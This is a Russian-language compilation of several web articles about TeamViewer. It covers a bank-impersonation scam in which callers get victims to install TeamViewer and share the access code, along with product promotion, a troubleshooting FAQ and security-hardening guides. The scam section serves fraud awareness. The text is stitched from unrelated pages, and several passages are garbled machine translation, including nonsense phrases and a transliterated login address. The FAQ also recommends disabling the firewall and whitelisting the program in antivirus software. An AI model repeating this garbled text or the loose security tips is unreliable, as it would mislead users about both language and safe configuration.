Мошенничество с помощью TeamViewer довольно распространено и для банков не новость
Описанный в статье Российской газеты новый способ финансового мошенничества с помощью программы делегирования доступом TeamViewer оказался довольно распространенным.
Российская газета опубликовала статью, описывающую якобы новый способ мошенничества. Злоумышленник от имени сотрудника Сбербанка звонит на мобильный и сообщает о блокировке несанкционированной попытки перевода денежных средств в другом регионе.
При этом он не запрашивает конфиденциальных данных. Однако для того чтобы полностью обеспечить безопасность счетов, предлагает сверить устройства, имеющие доступ к личному кабинету, а после с помощью стороннего приложения TeamViewer — помочь отключить на смартфоне ОС, которой собеседник не пользуется.
Как рассказал порталу PLUSworld.ru Алексей Голенищев, директор по мониторингу операций и диспутам Альфа-Банка, «на самом деле это один из сценариев, к сожалению, довольно распространенной в настоящее время мошеннической схемы социальной инженерии, которую мы называем «Спасатель». Все эти сценарии объединяет то, что клиенту звонит якобы «сотрудник безопасности» и сообщает о том, что они выявили и приостановили операцию (как правило совершаемую в адрес получателя из удаленного региона, например, Хабаровска, Калинграда и т.п.). Клиент, естественно, заявляет, что это не он, на что «сотрудник» банка предлагает различными вариантами, в зависимости от реакции «жертвы», «спасти» эти средства, переведя их на некий «сейфовый» или «сберегательный» счет, фактически являющийся счетом мошенников. В ряде случаев доходит до абсурда, когда клиентов убеждают снять деньги с «атакуемого» счета в банкомате и внести наличными для «спасения» на счета мошенников. Причем звонящие «сотрудники» стараются всячески запугать жертву, не отпуская его с телефона.
В описываемом случае, сообщая клиенту, что его банковское мобильное приложение взломано мошенниками или заблокировано в целях безопасности банком, мошенники просят клиента установить из Google Play приложение TeamViewer Quick Support или другое, аналогичное по функционалу, выманивают у него код активации удаленного доступа, тем самым получая полный контроль над телефоном жертвы и его функционалом с возможностью совершения мошеннических операций».
Эксперт еще раз напомнил: «чтобы не стать жертвой данного мошенничества, необходимо знать, что, если звонящий вам «сотрудник» банка просит совершить какие-либо действия, назвать кодовое слово, одноразовые пароли и т.п. – это мошенник. С официальных телефонов банка сотрудники не звонят, это номера только для входящих вызовов. Если банк выявил попытку мошеннической операции, он сам ее может приостановить, клиенту ничего делать, не надо».
TeamViewer (Тим вивер) — отзывы о программе
Тимвьювер является универсальной программой для удалённого управления компьютерами. Приложение разрабатывается немецкой компанией «TeamViewer GmbH», которая начала свою деятельность в 2005 году. Благодаря регулярным обновлениям, функционал приложения стабильно расширяется, предоставляя новые возможности для пользователей. О программе Teamviewer 9 отзывы вы можете оставить на данной странице. Следует отметить, что пользователи особенно бояться за безопасность своего ПК при использовании Тим Вивер. Именно поэтому многие ищут отзывы про безопасность Тимвьювера.
Особенности Тим вивер
Многозадачность
Тим вивер предоставляет возможность работы с несколькими подключениями одновременно
Wake on LAN
Данная функция позволяет включать удалённые компьютеры с помощью LAN
Безопасность
Двойная система защиты аккаунта с помощью аутентификации
Кроссплатформенность
Поддержка различных операционных систем, включая также и мобильные варианты
Передача файлов
Teamviewer обеспечивает возможность передачи файлов больших размеров. При этом, безопасность компьютера нисколько не страдает, о чем свидетельствуют многочисленные отзывы пользователей
Мгновенное подключение
Пользователь может подключаться к определённому устройству с помощью ярлыка
Оповещение
Приложение имеет удобную систему уведомлений о входящих сообщениях от пользователей, а также о различных процессах
Дизайн
Программа имеет простой и понятный интерфейс, который способствует более комфортной работе
Бесплатное пользование
Разработчики предоставляют возможность бесплатного личного пользования программой, требуя покупки только для коммерческого использования
Данное приложение предоставляет наиболее широкий функционал для работы с удалёнными устройствами. TeamViewer очень популярна в сфере технического обслуживания, а также проведения дистанционных уроков. На данной странице вы можете оставить, а также просмотреть о teamviewer отзывы безопасность, функционал, удобство и качество работы.
что клиентам банков полезно знать об этом приложении
Способы отъёма денег у граждан непрерывно совершенствуются. С недавних пор злоумышленники стали применять для мошеннических действий в отношении клиентов банков схему с использованием приложения Teamviewer. Рассказываем, как это работает.
Что такое Teamviewer
Teamviewer – это программа, которая даёт возможность подключаться через интернет со своего устройства (компьютера, смартфона) к удалённому. На рабочем столе управляющего устройства возникает рабочий стол управляемого, и с ним становится возможным работать так, как будто оно находится перед вами. Эта схема работы пользуется большой популярностью, с её помощью решаются разнообразные задачи, например устраняются проблемы без выезда на место.
Получить доступ к чужим компьютерам и смартфонам – мечта многих злоумышленников, ведь на таких устройствах может содержаться информация о доступе к финансовым данным. Это могут быть реквизиты банковских карт, приложения для онлайн-банкинга и другие ресурсы. Пробравшись к ним через Teamviewer, злоумышленник получает «ключи от квартиры, где деньги лежат».
Чтобы управляющее устройство могло подключиться к управляемому, нужно, чтобы на обоих был установлен Teamviewer.
Приложение нужно запустить, и после этого пользователь управляемого устройства сообщает пользователю управляющего ID и пароль для подключения. После подключения с управляющего устройства можно производить любые действия на управляемом. Поэтому главная задача мошенника – убедить жертву дать ему удалённый доступ к ПК или смартфону, и для клиентов банков была придумана правдоподобная легенда.
Как работает схема мошенничества с приложением Teamviewer
Мошенническая схема с клиентами банков через Teamviewer работает следующим образом. Злоумышленник тем или иным образом добывает телефон жертвы, которая обслуживается в каком-то банке, и звонит ей, представляясь сотрудником именно этого финучреждения.
Такой звонок, если на него отвечают, не должен вызывать подозрений. Мошенник не пытается выведать реквизиты карты или логин и пароль для входа в онлайн-банк, что обычно сразу заставляет насторожиться. Так что если разговор начинается, злоумышленник старается аккуратно, не отпугивая, склонить жертву к тому, чтобы она проглотила наживку.
Делается это в форме повествования о том, что к деньгам жертвы попытался получить доступ кто-то посторонний, и банк его раскусил. Раскусил он потому, что попытка списания средств была сделана не из того региона, где живёт клиент, а из другого. Поэтому подозрительная операция якобы была заблокирована банком, и одновременно этот случай выявил то, что к деньгам есть доступ у постороннего. После этого мошенник предлагает жертве устранить проблему, для чего требуется удалённый доступ к ПК или смартфону жертвы, через который та подключается к онлайн-банку.
Конечно, далеко не у всех клиентов банков установлено десктопное или мобильное приложение Teamviewer. И далеко не каждый клюнет на такую наживку. Но если найдётся кто-то слишком доверчивый, то дальше всё будет делом техники, и мошенник в итоге получит доступ к деньгам жертвы.
Что делать, если вы попались на крючок
Если вы почувствовали, что предоставили доступ к своему ПК или смартфону через Teamviewer злоумышленнику, нужно сразу позвонить в банк и сообщить о произошедшем. Безопасность средств клиентов – один из приоритетов нормального финучреждения. Банк выявит факт мошенничества или его попытки и предпримет меры для предотвращения таких инцидентов, проинструктирует клиента о дальнейших действиях. Правильным будет также обратиться с заявлением в полицию, особенно если деньги были украдены.
Предупреждён, значит вооружён
За сохранность денег несёт ответственность не только банк, но и их владелец. Поэтому если вам кто-то звонит, представляется сотрудником обслуживающего финучреждения и рассказывает о доступе посторонних лиц к вашему счёту, нужно насторожиться. Если же вслед за этим следует просьба подключиться к вашему ПК или смартфону для устранения проблемы через Teamviewer, это однозначно мошенничество.
Часто задаваемые вопросы об использовании программы TeamViewer (часть 3)
TeamViewer: идентификация отклонена, что делать
«Waitforconnectfailed» TeamViewer — как исправить?
TeamViewer не готов, проверьте подключение — что делать?
TeamViewer: ошибка согласования протоколов, как исправить?
TeamViewer: как убрать всплывающее окно
Как сделать, чтобы TeamViewer не отключался
Как отключить TeamViewer
Можно ли играть через TeamViewer
TeamViewer: сменить пароль
Как удалить TeamViewer полностью с компьютера
Многофункциональный инструмент TeamViewer, обеспечивающий удаленное внешнее управление ПК, имеет несколько режимов работы, и довольно простую систему настроек. Программу можно использовать для проведения конференций, многопользовательского чата, печати файлов с удаленного компьютера и многого другого.
Присутствуют также разные виды установки – ПО можно запускать при необходимости без инсталляции, применяя портативный режим. У пользователей могут возникнуть вопросы по поводу некоторых нюансов использования инструмента. Чтобы не возникло сложностей при эксплуатации, рекомендуем приобрести ключ лицензии TeamViewer. Настройка лицензионной версии не отличается особой сложностью, при необходимости всегда можно обратиться в службу техподдержки.
TeamViewer: идентификация отклонена, что делать
Может возникнуть ситуация, когда при попытке подключиться к удаленному устройству программа выдает сообщение: «Идентификация отклонена». Причиной может быть работающее антивирусное обеспечение, фаервол. Также соединение с ПК невозможно установить, если удаленный пользователь отклоняет его.
Чтобы устранить проблему, попробуйте поставить ПО в список исключений в антивирусе, временно отключить фаервол. Иногда нужно вручную устанавливать пароль на удаленном компьютере, чтобы обеспечить корректный доступ.
«Waitforconnectfailed» TeamViewer — как исправить?
Одна из распространенных ошибок, которая может возникнуть и в процессе установки программы, и при запуске. Причины возникновения:
Некорректная инсталляция ПО;
Реестр TeamViewer поврежден, в связи с установкой или удалением ПО, которое имеет отношение к TV;
Поврежденный загрузочный файл;
Удаление программы вредоносным ПО, преднамеренное повреждение данных;
Вирус, который проник в ОС.
Основными рекомендациями по устранению ошибки являются:
Очистите диски от мусора, временных папок и др.;
Проведите глубокое сканирование ПК на наличие вредоносных программ;
Воспользуйтесь функцией «Восстановление системы»;
Произведите обновление драйверов;
Проверьте системные файлы, просмотреть записи реестра, которые связаны с данной ошибкой;
По возможности устанавливайте все обновления на ОС и обновляйте драйвера до последней версии.
TeamViewer не готов, проверьте подключение — что делать?
Если программа не запускается, нужно проверить настройки антивируса, брандмауэра. Перед выполнений действий, убедитесь, что установка программы была осуществлена правильно. Нелишним будет сканировать ПК на наличие вирусов.
Инструмент для удаленного доступа TeamViewer может некорректно включаться, если запуск произведен не от имени администратора. Еще одной распространенной причиной могут быть неполадки с сетью, проблемы с сервером.
TeamViewer: ошибка согласования протоколов, как исправить?
Возможной причиной данной ошибки является несовпадение используемых версий программы на удаленном компьютере и ПК администратора. Также программа может быть неактуальной версии, которая не поддерживается другим устройством. Для уточнения причины рекомендуем обратиться в техподдержку.
TeamViewer: как убрать всплывающее окно
Чтобы убрать всплывающее окно в программе для удаленного доступа после завершения сеанса, нужно приобрести ПО для коммерческого использования. Применение некоммерческой версии подразумевает появления окна с сообщением.
При установлении связи с удаленным устройством в правом нижнем углу появляется окно с сообщением о подключении. ПО предназначено для осуществления санкционированного доступа, поэтому пользователь получает сообщение с предупреждением о том, что к его ПК пытаются осуществить подключение.
Как сделать, чтобы TeamViewer не отключался
У ПО есть два вида использования: коммерческое и некоммерческое. Некоммерческое использование предполагает применение программы в личных целях, без соединения с большим количеством компьютеров. Если обнаружено соединение с корпоративными компьютерами, либо попытка доступа из офиса к домашнему компьютеру, сеанс связи может ограничиваться.
В таком случае TeamViewer обеспечивает соединение для удаленного доступа в течение короткого промежутка времени, сначала 10, а потом 5 минут. Чтобы избежать ограничения связи, следует использовать некоммерческую версию ПО исключительно в личных целях, либо приобрести лицензионную коммерческую версию программы.
Как отключить TeamViewer
После использования программы, если в ближайшее время вы ее не будете использовать, можно отключить TeamViewer. В меню найдите вкладку «Подключение» и левой кнопкой мыши кликните на нем. Выберите пункт «Выйти из TeamViewer». Программа будет закрыта.
Если вы не запускали ПО, но в процессах в Диспетчере Задач она отражается, значит в TeamViewer включена функция автозагрузки вместе с ОС. Чтобы отключить автозапуск, нужно убрать в настройках «Основное» опцию «Запускать TeamViewer при загрузке Windows».
Можно ли играть через TeamViewer
Через ПО возможен запуск игры на удаленном устройстве. Однако, существует вероятность, что вместо изображения будет черный экран, либо сама игра будет отображаться покадрово. Такая ситуация может возникать из-за настроек TeamViewer, которые оптимизированы для улучшения качества связи, экономии трафика.
Если игра занимает много оперативной памяти, там используется 3D-графика – скорости Интернет-канала возможно не хватит, для качественного соединения. Рекомендуем использовать программу для удаленного управления компьютером с целью выполнения бизнес-задач. В таком случае, программа будет работать корректно и проблем возникнуть не должно.
TeamViewer: сменить пароль
Постоянный пароль в программе удобно использовать для осуществления доступа на проверенные устройства, например, домашние ПК. Для того чтобы изменить пароль, необходимо выбрать вкладку «Дополнительно».
Перейдите в пункт «Опции». Откроется диалоговое окно со список подразделов, которые можно настраивать. Следует выбрать раздел «Безопасность». В настройках можно ввести новый личный пароль, подтвердить его, и таким образом, кодовое слово будет изменено.
Как удалить TeamViewer полностью с компьютера
Деинсталляция программы производится стандартным способом через Проводник. Если больше нет необходимости в использовании программы, вы можете удалить ее. Через меню «Пуск» следует зайти в «Панель управления». Зайдя в раздел «Программы», выберите TeamViewer.
Кликнув правой кнопкой мыши на ПО, нужно нажать на пункт «Удалить». Желательно перезагрузить ПК после удаления всех компонентов программы.
Повысьте свою безопасность в TeamViewer: ограничьте доступ и смените пароль
Как вы знаете, это программы, которые позволяют нам, как следует из их названия, подключаться к другому PC не вставая с места. Как он легко понять, все это позволит нам добиться всевозможных activités я толстый расстояние , через Интернет. Преимущества всего этого практически безграничны, поэтому эти программы используются как в домашних, так и в офисных средах.
Например, это может быть полезно для устранения проблемы с компьютером друга или родственника, причем все это на нашем собственном компьютере. компьютер . Они также широко используются техническими службами и отделами обслуживания крупных компаний. Это позволяет им получать доступ к системам своих клиентов, не путешествуя, что экономит время и деньги. Кроме того, некоторые из этих предложений имеют мобильную версию, что увеличивает их полезность. Так, например, мы можем получить доступ к нашему Настольный ПК с Окна 10 и управляйте им с мобильного с помощью Android .
Это случай с одним из самых популярных и используемых предложений этого типа в мире, мы ссылаемся на TeamViewer . Однако как в этой альтернативе, так и в остальных, которые мы можем использовать, есть один аспект, на который мы должны обратить особое внимание: безопасность . И, конечно же, мы говорим о предоставлении удаленного доступа к нашему оборудованию другому человеку, чтобы он мог управлять им по своему желанию.
Настройте TeamViewer, чтобы позаботиться о безопасности данных вашей команды
По всем этим причинам эти приложения удаленный офис обычно есть функции настройки, которые помогут нам в этих задачах. Это, конечно, относится к вышеупомянутому TeamViewer, как мы покажем вам ниже. Фактически, мы собираемся показать вам, как настроить и ограничить доступ к функциям в удаленный сеанс , Например.
Для этого, как только мы попадаем в программу как таковую и до того, как кто-либо свяжется с нашей командой, мы переходим в меню «Дополнительно / Параметры». В появившемся новом окне мы увидим разные разделы программы , все настраивается. Однако в данном случае нас интересует «Дополнительно», поэтому мы нажимаем на него. Прежде чем вносить какие-либо изменения, нам нужно будет нажать на новый кнопка доступа , потому что эти функции предназначены опытным пользователям или тех зная программу.
Нажимая на нее, мы находим то, что нас интересует, и ищем. Речь идет о разделе «Расширенная настройка подключения данного оборудования». Прежде всего, нам нужно получить доступ к выпадающий список «Контроль доступа». В нем мы можем указать элементы оборудования, которые будут доступны в удаленном сеансе. Поэтому мы рекомендуем вам нажать «Пользовательские настройки». Здесь мы можем активировать один за другим разные параметры, компоненты и способы использования, к которым мы дадим доступ или нет.
На этом же экране «Дополнительно» также важно настроить использование пароль когда другой пользователь обращается к нашему оборудованию. Таким образом, из «Случайного пароля после каждого сеанса» мы можем выбрать поведение этого важного элемента безопасности или просто обойтись без него, что мы не рекомендуем.
Как сделать работу в TeamViewer безопасной
Пандемии COVID-19, посадившей почти весь мир на удаленку, могут быть благодарны многие программные решения. Zoom? Вне всякого сомнения! Dell VDI Complete? Конечно. В этот список можно добавить еще с десяток популярных программ и сервисов. И в их числе наверняка окажется TeamViewer.
К слову, своих преданных поклонников «выстрелившее» благодаря коронакризису ПО приобрело не только среди администраторов. Простые пользователи тоже благодарны разработчикам, которые позволили им вкусить все прелести удаленного режима. (Допускаем, что у него хватает и противников, страдающих вне опенспейсов).
Проблемы удаленки
Но, вместе с удобством, которое дают решения, позволяющие сохранить предприятию устойчивость, а работникам – свои места, всеобщая удаленка создает трудности, о которых раньше нам приходилось только слышать, и то – от неисправимых пессимистов. Речь идет о безопасности. Каждое удаленное подключение пользователя к удаленному столу (а в наши дни их число исчисляется миллионами, а может и миллиардами) несет угрозу корпоративным системам и данным.
Да, личные устройства пользователей, как и корпоративные инфраструктуры сегодня в обязательном порядке защищаются антивирусными решениями. Но что делать, когда соединение устанавливается между гаджетом пользователя и его рабочим ПК, хранящим конфиденциальную информацию?
Первая, и самая очевидная мера – использование VPN, которую можно быстро и весьма недорого развернуть для внешних подключений к инфраструктуре. Но вместе с тем, такое соединение не исключает возможности перехвата данных и требует использования в обязательном порядке двухфакторной аутентификации.
Второй способ организации удаленного соединения – RDP (Remote Desktop Protocol). Но работать в этом случае придется только с программным обеспечением, установленном на терминальном сервере.
Наконец, можно использовать виртуальные рабочие станции или VDI. С одной стороны это – весьма удобно (сотруднику выделяется виртуальная машина с набором необходимого ПО). Но с другой – дорого, поскольку такое решение потребует дорогостоящего оборудования для своего развертывания.
Также по теме
А есть ли альтернатива? Да! TeamViewer!
Впрочем, есть еще одно решение – специализированные программы для организации удаленного доступа. И в первую очередь – TeamViewer, первоклассное решение c широчайшей функциональностью. Интересно, что всеми возможностями этого решения большинство пользователей не пользуется – их настолько много, что часто про них даже неизвестно простым юзерам.
Между тем, при помощи TeamViewer можно «закрыть» все задачи, связанные с организацией удаленного доступа. Схема лицензирования позволяет раздать персональные аккаунты широкому кругу сотрудников (Tensor), или использовать и в ситуации, когда сотрудники могут меняться — лицензия Corporate. При этом в качестве терминала доступа может использоваться и ПК, и мобильное устройство, что делает любого удаленного сотрудника настоящим универсалом.
Но, чтобы работа была успешной и, что не менее важно безопасной, стоит внимательно отнестись к настройкам TeamViewer. О них то мы и поговорим дальше.
Настраиваем TeamViewer
Прежде всего, упомянем важную деталь. Для подключения к удаленному устройству TeamViewer использует 256-битное шифрование AES, и преодолеть его можно только используя самое слабое звено в обороне информационных систем – человека. И, чтобы этого не произошло, нужно последовательно выполнить несколько совсем несложных действий.
Для начала создаем аккаунт TeamViewer на сайте teamviewer.com. Использовать решение в частных целях можно бесплатно. А вот для корпоративного применения имеются несколько разных тарифных планов. Для тех, кто подключается к 1-3 машинам предназначена упрощенная версия TeamViewer Access. Если же машин, к которым необходимо подключиться, больше трех, то можно использовать версии Business (однопользовательская) и Premium, Corporate (плавающие многопользовательские) или Tensor (корпоративная лицензия).
Выбор велик, и лучше предварительно проконсультироваться у менеджеров партнерской компании. Вкратце описать различия версий можно так: Business позволяет активировать аккаунт на 3 устройствах, Premium, Corporate и Tensor не ограничивают число используемых устройств, но различаются по количеству возможных пользователей и встроенным инструментам логирования, аудирования и безопасности.
Итак, после создания аккаунта, можно скачать с того же сайта программу, установить ее на компьютере или мобильном устройстве и ввести свои учетные данные. При этом если вы переходите с бесплатного на платный тариф, приобретенная лицензия автоматически «привяжется» к аккаунту.
Обеспечиваем безопасность
А теперь – о простых и необходимых действиях, необходимых для защиты удаленного доступа. Возьмите в привычку скрывать вводимые учетные данные нечитаемыми символами. Делать это необходимо даже если вы уверены, что за вашей спиной никого нет. В арсенале злоумышленников есть средства, позволяющие считать данные, и число атак с их использованием остается стабильно высоким.
В TeamViewer скрыть данные можно при помощи специальной опции.
Дополнительно –> Опции –> безопасность
И дополнительно –> Опции -> Дополнительно
Такие настройки обеспечат защиту от несанкционированного подключения и дадут доступ только тем пользователям, права которых вы подтвердите сами.
Можно и регламентировать права доступа. Он может быть полным, с возможностью выполнения действий на вашем ПК, или в «режиме указки», когда сторонний пользователь будет помогать вам, просто управляя курсором.
Дополнительно –> Опции -> Дополнительно
TeamViewer позволяет подключиться к устройству несколькими способами. Во-первых, можно устанавливать неограниченное соединение персонального устройства и удаленной машины, на которой введены данные аккаунта пользователя.
Во-вторых, можно задать персональный пароль для устройства. Сделать это можно в дополнительных настройках.
Помните, что ни при каких условиях, никогда и никому нельзя сообщать свой персональный пароль. И, если необходимо предоставить доступ стороннему пользователю, создайте временный.
Оградить себя от нежелательных подключений можно, используя функцию черного и белого списков. Она дает возможность указать ID устройств тех машин, которым вы разрешаете подключаться к вашей. И устройствам, не входящим в список, доступ будет закрыт.
И еще одна важная мера. Никому не доверяйте изменение настроек на вашем компьютере.
И не забывайте свой пароль!
Как заблокировать TeamViewer для более безопасного удаленного доступа
TeamViewer
отличная бесплатная программа, независимо от того, хотите ли вы получить доступ к своему компьютеру издалека или помогать друзьям и родственникам с их компьютером . Но его настройки по умолчанию очень небезопасны, вместо этого они способствуют простоте использования. Вот как заблокировать TeamViewer, чтобы вы могли использовать его функции, не подвергаясь атаке.
Проблема с TeamViewer
СВЯЗАННЫЕ С: Лучшие инструменты для упрощения удаленной технической поддержки
Еще в 2016 году было
целый ряд компьютеров, взломанных через TeamViewer
. И только сейчас, в декабре 2017 года, TeamViewer был вынужден выпустить экстренное исправление серьезной уязвимости в программе. Тем не менее, даже когда нет явных дыр в безопасности или широко распространенных атак, пользователю TeamViewer очень легко скомпрометировать свой компьютер, если у него нет всех правильных настроек. И если вы посмотрите на отчеты о прошлых взломанных машинах,
большинство жертв использовали незащищенную установку
.
По умолчанию TeamViewer не является особо безопасным приложением. Он отдает предпочтение простоте использования перед сложными процедурами безопасности. Это полезно, когда вы пытаетесь помочь своему отцу решить его компьютерные проблемы со всей страны: вы можете попросить его скачать один файл, запустить этот файл, дать ему простой числовой идентификатор компьютера и пароль, а также бум , вы управляете его компьютером и решаете кризис. Но оставить TeamViewer в этом простом режиме первого запуска (который на самом деле следует использовать только в таком простом состоянии для этих разовых чрезвычайных ситуаций) просто напрашивается на проблемы.
Однако в TeamViewer есть множество параметров безопасности, которые вы можете включать и настраивать, и действительно легко перейти от незащищенного интерфейса TeamViewer к очень безопасный опыт работы с TeamViewer, требуя лишь небольших усилий.
Однако прежде чем мы продолжим, мы хотели бы, чтобы вы помнили несколько вещей при чтении этого руководства. Во-первых, не каждому нужно включать все предлагаемые нами варианты. Вам необходимо сбалансировать свои потребности и рабочий процесс с внесенными вами изменениями безопасности — вы не захотите, например, включать функцию, которая требует, чтобы пользователь на компьютере принимал входящий запрос TeamViewer, если вы используете TeamViewer для подключения на свой собственный необслуживаемый компьютер.
Во-вторых, если TeamViewer установлен на вашем компьютере во время вашей работы, нанятой вами компанией технической поддержки или родственником, который помогает устранять неполадки и обслуживать ваш компьютер, мы рекомендуем вам прочитать эту статью (и потенциально воспользоваться некоторых советов), но также проконсультироваться с лицом, отвечающим за работу с TeamViewer.
Базовые методы обеспечения безопасности
Прежде чем мы перейдем к подробным настройкам TeamViewer, давайте поговорим о нескольких основных методах обеспечения безопасности (которые, честно говоря, применимы практически к любой программе, а не только к TeamViewer).
Выйдите из TeamViewer и запускайте только тогда, когда вам это нужно
Наше первое предложение — это немедленные действия, которые вам необходимо предпринять. а также общее предложение для будущего использования. Во-первых, компромиссы часто являются результатом плохой практики безопасности, мы собираемся сделать одну вещь сразу: временно выключить TeamViewer и обновить его, и, пока приложение отключено, мы собираемся обновить безопасность на вашем Учетная запись TeamViewer через веб-страницу компании. (Подробнее об этом в следующем разделе.)
В качестве общего соображения на будущее, запускайте приложение TeamViewer только тогда, когда оно вам нужно . Таким образом, даже если в программе есть уязвимость (например, только что обнаруженная и исправленная), вы не подвергнетесь такой большой опасности. Приложение, которое не запущено, не может доставить вам никаких проблем. Хотя мы понимаем, что некоторые люди используют TeamViewer 24/7 в рамках своего рабочего процесса, и если вам это абсолютно необходимо, прекрасно. Но если вы используете его только изредка у себя дома или вы один из тех, кто включает его только для того, чтобы время от времени устранять неполадки в компьютере родственника, то не оставляйте его включенным весь день, каждый день. Это единственный лучший способ не дать кому-то доступ к вашей машине.
Помня об этом, закройте приложение TeamViewer, если оно в данный момент работает, прежде чем переходить к следующим шагам.
Создайте надежный пароль
После закрытия приложения TeamViewer пора войти в свою учетную запись TeamViewer на странице
хттпс://логин.теамвивер.ком
. Если вы используете TeamViewer без учетной записи, мы настоятельно рекомендуем вам создать бесплатную учетную запись, поскольку она намного безопаснее. Многие советы по безопасности, которые мы собираемся выделить в ходе этого руководства, не только основаны на функциях, доступных только владельцам учетных записей, но вы не можете воспользоваться преимуществами недавно развернутых скрытых функций безопасности —
мониторинг аккаунта и доверенных устройств
— без счета.
После входа в систему щелкните свое имя в правом верхнем углу экрана и в раскрывающемся меню выберите «Изменить профиль».
Вы попадете в раздел «Общие» меню «Настройки профиля». Здесь нас интересуют два раздела: ссылка «Изменить пароль» и двухфакторная аутентификация (к которой мы скоро вернемся). Выберите «Изменить пароль».
Введите свой текущий пароль и замените его длинным и надежным новым паролем. Подтвердите пароль, а затем выберите «Изменить пароль». Хотите освежить свои навыки создания надежных паролей? Мы вас прикрыли .
Включить двухфакторную аутентификацию
Прежде чем мы продолжим, мы должны кое-что сильно подчеркивать. Включение двухфакторной аутентификации в вашей учетной записи TeamViewer повышает безопасность учетных данных для входа в вашу учетную запись TeamViewer. Это не по умолчанию к реальному клиенту применяется двухфакторная система. Вы можете установить очень надежный пароль для своей учетной записи TeamViewer и включить двухфакторную аутентификацию, но если вы оставите пароль клиента, установленный на четырехзначный цифровой пароль по умолчанию, то двухфакторная аутентификация никак не защитит вас.
Крайне важно, чтобы вы выполнили все руководство здесь и (как мы продемонстрируем в следующих разделах) либо установили очень надежный пароль для своего клиента TeamViewer, либо, что еще лучше, заблокировали своего клиента для своей учетной записи (тем самым заблокировав его для двух факторов аутентификация).
После изменения пароля вы, как и на предыдущем шаге, автоматически выйдете из своей учетной записи TeamViewer. Войдите в систему и вернитесь в то же место в меню «Профиль»> «Общие». Выберите ссылку «Активировать» рядом с «Двухфакторной аутентификацией».
Если вы не знакомы с двухфакторной аутентификацией, вы можете читайте об этом здесь . Короче говоря, двухфакторная аутентификация добавляет еще один уровень идентификации к процессу входа в систему (вместо вашей электронной почты и пароля вам понадобится ваш адрес электронной почты, пароль и уникальный код, сгенерированный приложением аутентификации на вашем мобильном телефоне). TeamViewer
поддерживает несколько аутентификаторов
, включая Google Authenticator (
iOS
/
Android
) и Аути (
iOS
/
Android
). Найдите минутку, чтобы установить одно из вышеупомянутых приложений, если вы еще не используете его.
После того, как вы выбрали «Активировать», вы увидите это маленькое меню с описанием двухфакторной аутентификации. Нажмите «Начать активацию».
На этом этапе вы увидите экран, подобный показанному ниже, с большим черным QR-кодом в центре. Откройте выбранный вами аутентификатор, нажмите кнопку, чтобы добавить новую услугу, и отсканируйте QR-код.
Если по какой-то причине сканирование не работает, вы всегда можете нажать ссылку «ввести секретный ключ вручную» и ввести его вместо сканирования. После того, как вы успешно добавите его в свой аутентификатор, нажмите «Далее».
Проверьте код безопасности для TeamViewer в приложении для проверки подлинности и введите его сейчас. Нажмите «Активировать» для подтверждения.
На последнем этапе распечатайте код аварийного восстановления. Храните этот код в надежном месте. Если вы потеряете доступ к своему аутентификатору, это единственный способ удалить двухфакторную аутентификацию.
На этом мы закончили работу с сайтом. После печати аварийного кода вы можете выйти из системы.
Обновить TeamViewer
Если вы запускаете TeamViewer нечасто или автоматические обновления были отключены где-то на линии, возможно, у вас не самая последняя версия. Однако установочный файл TeamViewer очень мал, поэтому просто взять самую свежую копию и запустить ее, чтобы убедиться, что ваше приложение TeamViewer обновлено, прежде чем мы даже откроем его снова.
Вы можете скачать обновленную версию
настольное приложение здесь
. Запустите приложение и выберите «Базовую» установку (чтобы предотвратить установку TeamViewer как службы Windows), затем запустите TeamViewer и войдите в приложение с новым паролем.
Сразу после входа вам будет предложено ввести защитный код из вашего двухфакторного защитного кода. Ссылайтесь на свое приложение для аутентификации и введите его сейчас.
Для большей безопасности после завершения процесса входа вы можете выбрать «Справка»> «Проверить наличие новой версии» на панели инструментов, чтобы убедиться, что вы используете самую последнюю версию.
Заблокируйте настройки безопасности TeamViewer
На этом этапе вы уже на шаг впереди, просто заменив свой пароль на новый, более надежный и включив двухфакторную аутентификацию. Хотя это защищает вашу учетную запись TeamViewer в целом, нам все же нужно немного поработать в самом приложении TeamViewer.
Мы хотим подчеркнуть то, что мы подчеркнули в начале руководства: выбранные вами настройки и параметры во многом зависят от того, как вы используете TeamViewer. Если вы настраиваете TeamViewer как способ удаленного доступа к своему компьютеру, когда вы находитесь вдали от дома, тогда вы сделаете другой выбор, чем если бы вы настраивали клиент TeamViewer на компьютере своих пожилых родителей. Мы рекомендуем вам установить максимальное количество настроек, которое вы можете, не уменьшая полезность TeamViewer до такой степени, что это скорее помеха, чем помощь.
Чтобы начать, перейдите в «Дополнительно»> «Параметры» в строке меню.
Все изменения настроек, которые мы внесем, находятся в меню параметров расширения. Чтобы избежать путаницы, мы перейдем к меню параметров, подменю за подменю.
Общие: нет автоматического запуска и назначения учетной записи
Для начала выберите вкладку «Общие» в левой навигационной панели.
Здесь вы хотите настроить два больших параметра. Во-первых, вы хотите подтвердить, что «Запустить TeamViewer с Windows» не отмечен, если у вас нет очень неотложная причина, чтобы его надеть. Если вы предоставляете техническую поддержку, вам действительно не нужно запускать TeamViewer с Windows. С другой стороны, если получатель технической поддержки не может справиться с трудностями, пытаясь запустить TeamViewer всякий раз, когда они звонят вам, включение этой настройки на их машине может быть необходимым злом, но, как мы уже говорили ранее, лучше всего запускать TeamViewer, когда вы его активно используете, то есть снимите этот флажок.
Внизу вы найдете раздел «Назначение аккаунта». Нажмите кнопку «Назначить учетной записи» и назначьте свой компьютер определенной учетной записи TeamViewer. Если это ваш персональный компьютер, доступ к которому требуется только вам, то вы хотите назначить компьютер своей учетной записи. Если этот компьютер принадлежит человеку, которому вы часто помогаете, то вы хотите назначить его компьютер твой Счет.
Трудно переоценить, какое повышение безопасности это предлагает. Если в вашей учетной записи включен надежный пароль и двухфакторная аутентификация, это означает, что вместо слабого случайного пароля по умолчанию клиент TeamViewer создает каждый сеанс, всем, кто пытается получить доступ к удаленному компьютеру, потребуется ваш логин, ваш надежный пароль, а также доступ к вашему аутентификатору.
Безопасность: непростой доступ, надежные пароли и белые списки
Наша следующая остановка — секция безопасности. Выберите «Безопасность» на левой панели.
Здесь у вас есть выбор, касающийся доступа по паролю и доступа к Windows. Во-первых, у нас есть раздел «Персональный пароль». Здесь вы можете установить личный пароль для этого клиента TeamViewer (для удаленного доступа) и предоставить «легкий доступ» (при этом для указанной учетной записи не нужно вводить пароль для доступа к машине, если они вошли в свой TeamViewer Счет).
